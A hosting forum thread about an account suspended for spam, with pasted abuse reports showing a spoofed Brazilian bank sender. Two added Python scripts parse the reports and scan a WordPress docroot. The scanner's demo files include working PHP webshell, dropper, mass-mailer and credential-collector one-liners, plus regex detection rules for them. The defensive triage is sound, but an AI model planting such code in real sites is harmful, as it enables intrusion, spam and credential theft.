
[Solved] Unsuspension


yoe06


We're receiving abuse reports about your email content, so you are sending spam even though you might not know it. These are just 2 reports, but we've received at least 5. Unfortunately Terra doesn't include the message body so we can't identify what was being sent.

My bet is that your WordPress install is hacked. It's infamous for terrible security if not maintained properly.

We have received a complaint about your account. Please investigate and fix within 24 hours.

Hurricane Electric Abuse Department
support@he.net

From fbl@bounce.mailstream.senderscore.net  Fri Mar 24 05:23:05 2023
Return-Path: <fbl@bounce.mailstream.senderscore.net>
X-Original-To: report@abuse.he.net
Delivered-To: report@abuse.he.net
Received: from mail.he.net (mail.he.net [216.218.186.2])
        by abuse.he.net (Postfix) with ESMTPS id B587D1EA07AD
        for <report@abuse.he.net>; Fri, 24 Mar 2023 05:23:03 -0700 (PDT)
Authentication-Results: abuse.he.net; dkim=pass
        reason="1024-bit key; insecure key"
        header.d=senderscore.net header.i=@senderscore.net
        header.b=vwf8KX9r; dkim-adsp=none (insecure policy);
        dkim-atps=neutral
Authentication-Results: mail.he.net;
        dkim=pass (no signature error) header.i=@senderscore.net header.s=081107 header.b=vwf8KX9r;
        spf=pass (mail.he.net: domain of bounce.mailstream.senderscore.net designates 54.84.12.226 as permitted sender) smtp.mailfrom=fbl@bounce.mailstream.senderscore.net smtp.helo=mrd.us-east-1a.returnpath.net;
        dmarc=none (Policy up to you. No DMARC record found) header.from=terrafbl.senderscore.net
X-DMARC-Results: none
X-SPF-Results: pass
Received-SPF: pass (mail.he.net: domain of bounce.mailstream.senderscore.net designates 54.84.12.226 as permitted sender) client-ip=54.84.12.226; envelope-from=fbl@bounce.mailstream.senderscore.net; helo=mrd.us-east-1a.returnpath.net;
X-DKIM-Results: pass
Received: from mrd.us-east-1a.returnpath.net (mrd.us-east-1a.returnpath.net [54.84.12.226])
        by he.net with ESMTPS (TLS_AES_256_GCM_SHA384:TLSv1.3:Kx=any:Au=any:Enc=AESGCM(256):Mac=AEAD)
        for <abuse@he.net>; Fri, 24 Mar 2023 05:21:54 -0700
Received: (Haraka outbound); Fri, 24 Mar 2023 12:21:53 +0000
Received: from localhost ([10.252.144.226])
        by mrd.us-east-1a.returnpath.net (Haraka/2.8.28) with ESMTP id A8F1F9DD-D380-4311-8351-AA729BB2BE20.1
        envelope-from <fbl@bounce.mailstream.senderscore.net>;
        Fri, 24 Mar 2023 12:21:53 +0000
Subject: Terra Abuse Report
From: Terra FBL Service <feedbackloop@terrafbl.senderscore.net>
Date: Fri, 24 Mar 2023 12:21:53 +0000
Mime-Version: 1.0
X-Rp-Fbl: type=arf; subscriptionID=241378
Content-Type: multipart/report; report-type=feedback-report;
 boundary=9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0
Message-Id: <01GW9S2Y1K9S5SWZRZB9P864TG.fbl@bounce.mailstream.senderscore.net>
To: abuse@he.net
DKIM-Signature: v=1;a=rsa-sha256;bh=SnNdbWtFcIUlOne3VuazZQ8MSFEAKZlebEuCJQZyIgk=;c=relaxed/simple;d=senderscore.net;h=from:to:subject;s=081107;b=vwf8KX9rf1MCanxqKaF6Rwf8DYB/5PMb6WAR+9pbFv1aVvNx3DmS9Odh3kTkRrtagAB0sC0cE19vCSTle9SyMSeuRyy2119gAfgb9J2PAo3DIga+qzJCtsGck2T8VC5fnOVxRYJg1zNKoFcSne5u/9Kcwy1i76rnJ0S6qJiVpgU=

--9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

This is a Terra Abuse Report for an email message received from domain bund=
er.my.id, IP 65.19.141.67, on Tue, 28 Feb 2023 21:38:50 +0000.

--9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: message/feedback-report

Version: 1
Arrival-Date: Tue, 28 Feb 2023 21:38:50 +0000
Original-Mail-From: support@bunder.my.id
Abuse-Type: complaint
Subscription-Link: https://fbl.returnpath.net/manage/subscriptions/241378
User-Agent: ReturnPathFBL/2.0
Original-Rcpt-To: eb9538615f462d0de4fc3ef6b78b2567@terra.com.br
Reported-Domain: bunder.my.id
Source-Ip: 65.19.141.67
Source: Terra
Feedback-Type: abuse

--9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: message/rfc822

Return-Path: <support@bunder.my.id>
Delivered-To: 004734933d6e2dd86ec9019171129540@terra.com.br
Received: from mail-proxy03-mia.tpn.terra.com ([208.84.242.88])
 by mail-trr-box15-mia.tpn.terra.com with LMTP id oLPRJXF0/mMy2AEA9pqQ4A
 for <004734933d6e2dd86ec9019171129540@terra.com.br>; Tue, 28 Feb 2023 21:38:57 +0000
Received: from cmgw ([208.84.242.88])
 by mail-proxy03-mia.tpn.terra.com with LMTP id yN2LLW90/mMS7QEAR65jug
 ; Tue, 28 Feb 2023 21:38:57 +0000
Received: from johnny.heliohost.org ([65.19.141.67])
 by mail-cmgw-in07-mia.tpn.terra.com with ESMTP
 id X7gRp4ewlpcl8X7gTprKTb; Tue, 28 Feb 2023 21:38:54 +0000
X-Terra-Spam: No
X-CMAE-Analysis: v=2.3 cv=XPNOtjpE c=1 sm=1 tr=0
 a=QxEgMx/s3b230QKQu9V1uw==:117 a=QxEgMx/s3b230QKQu9V1uw==:17
 a=m04uMKEZRckA:10 a=r77TgQKjGQsHNAKrUKIA:9 a=xgFWuFCl1Ux1yQevzSEA:9
 a=CjuIK1q_8ugA:10
X-CMAE-Score: 0
Received: by johnny.heliohost.org (Postfix, from userid 10411)
 id 0BF80402F8F4; Tue, 28 Feb 2023 21:38:51 +0000 (UTC)
To: "0856492f4c532a9a5ae6086260cb7cb3 04cec7ce92eb9ad836da62cc8c526019" <eb9538615f462d0de4fc3ef6b78b2567@terra.com.br>
Subject: 111
Date: Tue, 28 Feb 2023 21:38:50 +0000
From: support@bunder.my.id
Message-ID: <e6840e9fcc8446fc0d29774778a64934@bunder.my.id>
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="b1_e6840e9fcc8446fc0d29774778a64934"
Content-Transfer-Encoding: 8bit
X-PPP-Message-ID: <167762033079.29295.9162551223616650781@johnny.heliohost.org>
X-PPP-Vhost: yoe06.heliohost.us
X-CMAE-Envelope: MS4wfErSt2kCFv9nKpE17Lxhn6JtK15vrioxLAEzKv9gFKU/bBtSxwwBP8K+PUe9GOJbbi8ZTxNVW4R78oRWX+1kmqE2icIkWBbKwwmBME4gdFoAoE6rM+cW
 ZtpU71GjCXUj7Bo6Wyst2aiaMzOXJ1375gnURpxr/1dVn6A+iYJuL/BM


--b1_e6840e9fcc8446fc0d29774778a64934
Content-Type: text/plain; charset=us-ascii

sa



--b1_e6840e9fcc8446fc0d29774778a64934
Content-Type: text/html; charset=us-ascii

sa




--b1_e6840e9fcc8446fc0d29774778a64934--

--9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0--
We have received a complaint about your account. Please investigate and fix within 24 hours.

Hurricane Electric Abuse Department
support@he.net

From fbl@bounce.mailstream.senderscore.net  Sun Mar 19 17:17:38 2023
Return-Path: <fbl@bounce.mailstream.senderscore.net>
X-Original-To: report@abuse.he.net
Delivered-To: report@abuse.he.net
Received: from mail.he.net (mail.he.net [216.218.186.2])
        by abuse.he.net (Postfix) with ESMTPS id 0FC511EA0783
        for <report@abuse.he.net>; Sun, 19 Mar 2023 17:17:36 -0700 (PDT)
Authentication-Results: abuse.he.net; dkim=pass
        reason="1024-bit key; insecure key"
        header.d=senderscore.net header.i=@senderscore.net
        header.b=oEFq8rX4; dkim-adsp=none (insecure policy);
        dkim-atps=neutral
Authentication-Results: mail.he.net;
        dkim=pass (no signature error) header.i=@senderscore.net header.s=081107 header.b=oEFq8rX4;
        spf=pass (mail.he.net: domain of bounce.mailstream.senderscore.net designates 54.84.12.226 as permitted sender) smtp.mailfrom=fbl@bounce.mailstream.senderscore.net smtp.helo=mrd.us-east-1a.returnpath.net;
        dmarc=none (Policy up to you. No DMARC record found) header.from=terrafbl.senderscore.net
X-DMARC-Results: none
X-SPF-Results: pass
Received-SPF: pass (mail.he.net: domain of bounce.mailstream.senderscore.net designates 54.84.12.226 as permitted sender) client-ip=54.84.12.226; envelope-from=fbl@bounce.mailstream.senderscore.net; helo=mrd.us-east-1a.returnpath.net;
X-DKIM-Results: pass
Received: from mrd.us-east-1a.returnpath.net (mrd.us-east-1a.returnpath.net [54.84.12.226])
        by he.net with ESMTPS (TLS_AES_256_GCM_SHA384:TLSv1.3:Kx=any:Au=any:Enc=AESGCM(256):Mac=AEAD)
        for <abuse@he.net>; Sun, 19 Mar 2023 17:16:31 -0700
Received: (Haraka outbound); Mon, 20 Mar 2023 00:16:30 +0000
Received: from localhost ([10.252.144.144])
        by mrd.us-east-1a.returnpath.net (Haraka/2.8.28) with ESMTP id 9116F793-039D-4E15-84EC-D0B075D1CF45.1
        envelope-from <fbl@bounce.mailstream.senderscore.net>;
        Mon, 20 Mar 2023 00:16:30 +0000
Message-Id: <01GVY5ZV4HM6RCYWTRKFF3SMPW.fbl@bounce.mailstream.senderscore.net>
To: abuse@he.net
Subject: Terra Abuse Report
From: Terra FBL Service <feedbackloop@terrafbl.senderscore.net>
Date: Mon, 20 Mar 2023 00:16:30 +0000
Mime-Version: 1.0
X-Rp-Fbl: type=arf; subscriptionID=241378
Content-Type: multipart/report; report-type=feedback-report;
 boundary=9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca
DKIM-Signature: v=1;a=rsa-sha256;bh=EyRctsEeRiHeBzs8k3oUAnZQGq30PMKlh6mNURiFKgo=;c=relaxed/simple;d=senderscore.net;h=from:to:subject;s=081107;b=oEFq8rX4A3wGMu3tNc1OXev5kOeWW/4ckv7vC9IsR8LRPgFbvF3MEd/A0lY089mWQofN8B5JTRJeg9PaYKYiez0FNOv4hG/RpxmZK3+jYZsRtyVpJfXSmqRolg0HjP2YC04Cmx9F2gaqdFYFID8UgnuHomUYD6LGDEuvXOnL49Q=

--9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

This is a Terra Abuse Report for an email message received from domain yoe0=
6.heliohost.us, IP 65.19.141.67, on Wed, 01 Mar 2023 11:43:53 +0000.

--9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: message/feedback-report

Original-Rcpt-To: eb9538615f462d0de4fc3ef6b78b2567@terra.com.br
Source-Ip: 65.19.141.67
Abuse-Type: complaint
Feedback-Type: abuse
User-Agent: ReturnPathFBL/2.0
Version: 1
Arrival-Date: Wed, 01 Mar 2023 11:43:53 +0000
Original-Mail-From: yoe06@yoe06.heliohost.us
Reported-Domain: yoe06.heliohost.us
Source: Terra
Subscription-Link: https://fbl.returnpath.net/manage/subscriptions/241378

--9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: message/rfc822

Return-Path: <yoe06@yoe06.heliohost.us>
Delivered-To: 004734933d6e2dd86ec9019171129540@terra.com.br
Received: from mail-proxy05-mia.tpn.terra.com ([208.84.242.111])
 by mail-trr-box15-mia.tpn.terra.com with LMTP id wKi5KIA6/2NiCQAA9pqQ4A
 for <004734933d6e2dd86ec9019171129540@terra.com.br>; Wed, 01 Mar 2023 11:44:00 +0000
Received: from cmgw ([208.84.242.111])
 by mail-proxy05-mia.tpn.terra.com with LMTP id SKtJDoA6/2MdXgEAIU0ysA
 ; Wed, 01 Mar 2023 11:44:00 +0000
Received: from johnny.heliohost.org ([65.19.141.67])
 by mail-cmgw-in17-mia.tpn.terra.com with ESMTP
 id XKsFp780CyhsEXKsHpJjZh; Wed, 01 Mar 2023 11:44:00 +0000
X-Terra-Spam: No
X-CMAE-Analysis: v=2.3 cv=epKhMbhX c=1 sm=1 tr=0
 a=QxEgMx/s3b230QKQu9V1uw==:117 a=QxEgMx/s3b230QKQu9V1uw==:17
 a=8nJEP1OIZ-IA:10 a=k__wU0fu6RkA:10 a=v0iDO7klbHDT2XZXJOUA:9 a=wPNLvfGTeEIA:10
X-CMAE-Score: 0
Received: by johnny.heliohost.org (Postfix, from userid 10411)
 id 01A994063284; Wed, 1 Mar 2023 11:43:53 +0000 (UTC)
To: "0856492f4c532a9a5ae6086260cb7cb3 04cec7ce92eb9ad836da62cc8c526019" <eb9538615f462d0de4fc3ef6b78b2567@terra.com.br>
Subject: bunder1
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
X-Mailer: Microsoft Office Outlook, Build 17.551210
X-Priority: 1
X-MSmail-Priority: High
From: <sac@bradesco.com.br>
X-PPP-Message-ID: <167767103359.26215.9305641372538039991@johnny.heliohost.org>
X-PPP-Vhost: yoe06.heliohost.us
Message-Id: <20230301114354.01A994063284@johnny.heliohost.org>
Date: Wed, 1 Mar 2023 11:43:53 +0000 (UTC)
X-CMAE-Envelope: MS4wfHYHS7YZ+ObaIHDO4mUc9LId6QQuNGxl0THmKR15lCyLZAMKdqG/UJwv7oh+hG5/cNjYRVb8mjbVtAFTPZfs7DFcmztiqzQ6Y46babPpguKVpq77EVJW
 xDBqtQez6tWE2p6ihk5Jzya6boifrAInlRIc5rQp+pOA3e9Z44estkC6vBjJ3tEUg0oFYHDfwZ9vBg==


as

--9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca--



Just a correction regarding Terra abuse report emails:

They do have the message contents, though it may be difficult to read.

First message:

Quote

To: "0856492f4c532a9a5ae6086260cb7cb3 04cec7ce92eb9ad836da62cc8c526019" <eb9538615f462d0de4fc3ef6b78b2567@terra.com.br>
Subject: 111
Date: Tue, 28 Feb 2023 21:38:50 +0000
From: support@bunder.my.id
Message: sa

Second message:

Quote

To: "0856492f4c532a9a5ae6086260cb7cb3 04cec7ce92eb9ad836da62cc8c526019" <eb9538615f462d0de4fc3ef6b78b2567@terra.com.br>
Subject: bunder1
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
X-Mailer: Microsoft Office Outlook, Build 17.551210
X-Priority: 1
X-MSmail-Priority: High
From: <sac@bradesco.com.br>
Date: Wed, 1 Mar 2023 11:43:53 +0000 (UTC)
Message: as

Please note that second message was sent from Microsoft Outlook, not directly from your server's account (i.e., without using a mail client), so either you got your email account credentials stolen or your device is infected with some kind of malware. That second message even tried to spoof the from address, trying to impersonate a customer service email address (sac@bradesco.com.br) from a Brazilian bank (Bradesco) while in fact being sent from yoe06@yoe06.heliohost.us.

Please also note that both messages do not seem to be automatically reported by Terra mailing system (X-Terra-Spam: No), but rather manually flagged as spam/reported by the receiver, which in both cases is the same (eb9538615f462d0de4fc3ef6b78b2567@terra.com.br), but it is possible I am misinterpreting it.

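What a parser for these reports looks like, as an added example that is not part of the thread and not HelioHost's or Terra's code (standard-library Python; the function names `parse_arf` and `triage` are mine, and `SAMPLE_ARF` is a constructed, trimmed copy of the second Terra report quoted above). An ARF message is a `multipart/report` whose `message/feedback-report` part carries the envelope sender and source IP, and whose `message/rfc822` part is the offending message itself, which is where the body and the spoofed `From:` header come from:

```python
"""Pull the facts out of an ARF feedback-loop report (RFC 5965).

Added example for this thread, not HelioHost's or Terra's code; standard library
only. SAMPLE_ARF is a constructed, trimmed copy of the second Terra report above.
"""
import email
import re
from email import policy
from email.utils import parseaddr

SAMPLE_ARF = """\
From: Terra FBL Service <feedbackloop@terrafbl.senderscore.net>
Content-Type: multipart/report; report-type=feedback-report; boundary=arfb

--arfb
Content-Type: message/feedback-report

Feedback-Type: abuse
Original-Mail-From: yoe06@yoe06.heliohost.us
Source-Ip: 65.19.141.67

--arfb
Content-Type: message/rfc822

Return-Path: <yoe06@yoe06.heliohost.us>
Received: from johnny.heliohost.org ([65.19.141.67])
 by mail-cmgw-in17-mia.tpn.terra.com with ESMTP
 id XKsFp780CyhsEXKsHpJjZh; Wed, 01 Mar 2023 11:44:00 +0000
X-Terra-Spam: No
Received: by johnny.heliohost.org (Postfix, from userid 10411)
 id 01A994063284; Wed, 1 Mar 2023 11:43:53 +0000 (UTC)
Subject: bunder1
X-Mailer: Microsoft Office Outlook, Build 17.551210
From: <sac@bradesco.com.br>
X-PPP-Vhost: yoe06.heliohost.us
Content-type: text/html; charset=iso-8859-1

as

--arfb--
"""
# Postfix writes this when a local process (sendmail binary, PHP mail()) submits
# the message rather than an SMTP client; the number is the submitting UNIX uid.
USERID_RE = re.compile(r"\(Postfix, from userid (\d+)\)")


def parse_arf(raw):
    """Return {'feedback': {field: value}, 'original': EmailMessage} from an ARF report."""
    msg = email.message_from_string(raw, policy=policy.default)
    if (msg.get_content_type() != "multipart/report"
            or msg.get_param("report-type") != "feedback-report"):
        raise ValueError("not a multipart/report; report-type=feedback-report message")
    report = {"feedback": {}, "original": None}
    for part in msg.iter_parts():
        ctype = part.get_content_type()
        if ctype == "message/feedback-report":
            # The parser treats any message/* body as a nested message, so the
            # ARF fields come back as the headers of that nested message.
            fields = part.get_payload(0)
            report["feedback"] = {k.lower(): str(v).strip() for k, v in fields.items()}
        elif ctype == "message/rfc822":
            report["original"] = part.get_payload(0)
    if report["original"] is None:
        raise ValueError("report carries no message/rfc822 part")
    return report


def triage(report):
    """Compare envelope vs header sender, find the injecting hop, recover the body."""
    fb, orig = report["feedback"], report["original"]
    envelope_from = fb.get("original-mail-from", "")
    header_from = parseaddr(str(orig.get("From", "")))[1]
    env_domain = envelope_from.rpartition("@")[2].lower()
    hdr_domain = header_from.rpartition("@")[2].lower()

    # Each hop prepends a Received header, so the last one is the first hop.
    submitting_uid = None
    for received in reversed(orig.get_all("Received", [])):
        m = USERID_RE.search(str(received))
        if m:
            submitting_uid = m.group(1)
            break

    def header(name):
        return str(orig.get(name, "")).strip() or None

    body = orig.get_body(preferencelist=("plain", "html"))
    return {
        "source_ip": fb.get("source-ip"),
        "envelope_from": envelope_from,
        "header_from": header_from,
        "from_spoofed": bool(header_from) and env_domain != hdr_domain,
        "submitting_uid": submitting_uid,
        "vhost": header("X-PPP-Vhost"),
        "x_mailer": header("X-Mailer"),
        "provider_spam_flag": header("X-Terra-Spam"),
        "body_text": body.get_content().strip() if body is not None else "",
    }


if __name__ == "__main__":
    for key, value in triage(parse_arf(SAMPLE_ARF)).items():
        print(f"{key:>19}: {value}")
```

Run against the sample it reports `from_spoofed: True` (envelope domain yoe06.heliohost.us, header domain bradesco.com.br), `body_text: as`, and `submitting_uid: 10411`. That last value is what the innermost `Received:` line records: Postfix on johnny.heliohost.org accepted the message from a local process running as that uid, not over SMTP, which is the fact to chase on a shared host whatever the `X-Mailer` header claims, since that header is set by whatever generated the message.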

Did some digging... the yoe06@yoe06.heliohost.us account was used to spew bogus emails (and text messages via SMTP->SMS gateways). Tons of NDR notices for emails that just have "bunder <random numbers>" as the body, or the above "sa" and "as". I'm guessing a cybercriminal verifying emails considering there's no meaningful content in any of them. The abuse reports above have hashed emails as the recipients.

WordPress is very clearly hacked, and the account is full of malware. I see:

  • At least 2 dropper scripts
  • What I think is a bot for a botnet
  • A script meant to exfiltrate phished credentials.
  • A phishing site.

Time for a new account...

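A first-pass scan for the kinds of files wolstech lists (droppers, a mailer bot, a credential collector, a phishing page), as an added example that is not HelioHost's tooling and not from the post. Standard-library Python; the rule regexes are my assumptions about common dropper, webshell, mailer and collector idioms, and `SAMPLE_FILES` is a constructed docroot built in a temp directory so the scan runs offline. A hit is a lead for manual review, not proof:

```python
"""First-pass triage of a WordPress docroot for the file types named in the thread.

Added example, not HelioHost's tooling or anything from the original post. It flags
(1) PHP code under wp-content/uploads, (2) PHP hidden in non-PHP files, (3) eval /
decoder loaders and request-driven shells, (4) request-driven mailers and (5) scripts
that write request fields to disk. Regexes are assumptions; SAMPLE_FILES is constructed.
"""
import re
import tempfile
from pathlib import Path

PHP_EXTS = {".php", ".phtml", ".php5", ".php7", ".phar", ".inc"}
UPLOADS_PREFIX = "wp-content/uploads/"
MAX_BYTES = 2 * 1024 * 1024  # skip large media; droppers and shells are small

# [^;]*? keeps each match inside one PHP statement, which cuts cross-file false positives.
RULES = {
    "eval_of_request": re.compile(
        r"\beval\s*\([^;]*?\$_(POST|GET|REQUEST|COOKIE)\b"),
    "obfuscated_loader": re.compile(
        r"\b(eval|assert|create_function)\s*\([^;]*?"
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\("),
    "shell_from_request": re.compile(
        r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\([^;]*?"
        r"\$_(POST|GET|REQUEST|COOKIE)\b"),
    "request_driven_mailer": re.compile(
        r"\bmail\s*\([^;]*?\$_(POST|GET|REQUEST)\b"
        r"|\$_(POST|GET|REQUEST)\b[^;]*?\bmail\s*\("),
    "credential_collector": re.compile(
        r"\b(file_put_contents|fwrite|fputs)\s*\([^;]*?\$_(POST|REQUEST)\b"),
}


def scan_docroot(root):
    """Return [(relative path, sorted reasons)] for every file that trips a rule."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.stat().st_size > MAX_BYTES:
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        is_php_ext = path.suffix.lower() in PHP_EXTS
        has_php = is_php_ext or "<?php" in text or "<?=" in text
        reasons = set()
        if has_php and rel.startswith(UPLOADS_PREFIX):
            reasons.add("php_in_uploads")        # uploads should never hold executable code
        if has_php and not is_php_ext:
            reasons.add("php_in_non_php_file")   # e.g. a shell parked in a fake .ico
        if has_php:
            reasons.update(name for name, rule in RULES.items() if rule.search(text))
        if reasons:
            findings.append((rel, sorted(reasons)))
    return findings


# Constructed demo tree: two clean files and four of the kinds wolstech describes.
SAMPLE_FILES = {
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wordpress');\n",
    "wp-content/themes/demo-theme/functions.php":
        "<?php\nadd_action('init', 'demo_theme_setup');\n",
    # dropper: decodes and runs whatever is POSTed
    "wp-content/uploads/2023/03/image.php": "<?php\n@eval(base64_decode($_POST['p']));\n",
    # webshell hidden in a fake icon
    "wp-content/uploads/2023/03/favicon.ico": "<?php\n@system($_REQUEST['c']);\n",
    # spam cannon: recipients, subject, body and From all come from the request
    "wp-includes/class-wp-mailer-x.php":
        "<?php\nforeach (explode(\"\\n\", $_POST['list']) as $to) {\n"
        "    mail($to, $_POST['subj'], $_POST['body'], 'From: ' . $_POST['from']);\n}\n",
    # phishing collector: appends submitted credentials to a text file, then redirects
    "wp-content/uploads/login/post.php":
        "<?php\nfile_put_contents('data.txt', $_POST['user'] . ':' . $_POST['pass'] . \"\\n\", FILE_APPEND);\n"
        "header('Location: https://example.com/');\n",
}


def build_sample_tree(base):
    """Write SAMPLE_FILES under base and return the Path."""
    base = Path(base)
    for rel, content in SAMPLE_FILES.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return base


def demo():
    """Scan the constructed tree in a temp dir and return {path: reasons}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return dict(scan_docroot(tmp))


if __name__ == "__main__":
    for rel, reasons in demo().items():
        print(f"{rel}: {', '.join(reasons)}")
```

On a real account, point `scan_docroot` at the docroot and review every hit by hand; pair it with a diff against a clean WordPress tarball of the same version, since the scan only catches idioms it knows and says nothing about files that were simply replaced.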

  • wolstech changed the title to Unsuspension
19 hours ago, wolstech said:

Also, do you want your forum accounts merged? You have 3 forum accounts (yoe06, yoe2006, yoefie), and it looks like you've posted from both yoe06 and yoe2006.

If that's possible, that's fine, because the yoe2006 and yoefie accounts can no longer access there.


21 hours ago, wolstech said:

Invite for replacement account has been sent. Let us know when it's set up and I can have Krydos move your domains to the new account.

I have created a new account with yoefie; hopefully nothing like yesterday will happen again.


22 hours ago, Kairion said:

Just a correction regarding Terra abuse report emails:

They do have the message contents, though it may be difficult to read.

First message:

Second message:

Please note that second message was sent from Microsoft Outlook, not directly from your server's account (i.e., without using a mail client), so either you got your email account credentials stolen or your device is infected with some kind of malware. That second message even tried to spoof the from address, trying to impersonate a customer service email address (sac@bradesco.com.br) from a Brazilian bank (Bradesco) while in fact being sent from yoe06@yoe06.heliohost.us.

Please also note that both messages do not seem to be automatically reported by Terra mailing system (X-Terra-Spam: No), but rather manually flagged as spam/reported by the receiver, which in both cases is the same (eb9538615f462d0de4fc3ef6b78b2567@terra.com.br), but it is possible I am misinterpreting it.

I never send email using my own domain. I created an email account with my domain for me to switch to Gmail.


This topic is now closed to further replies.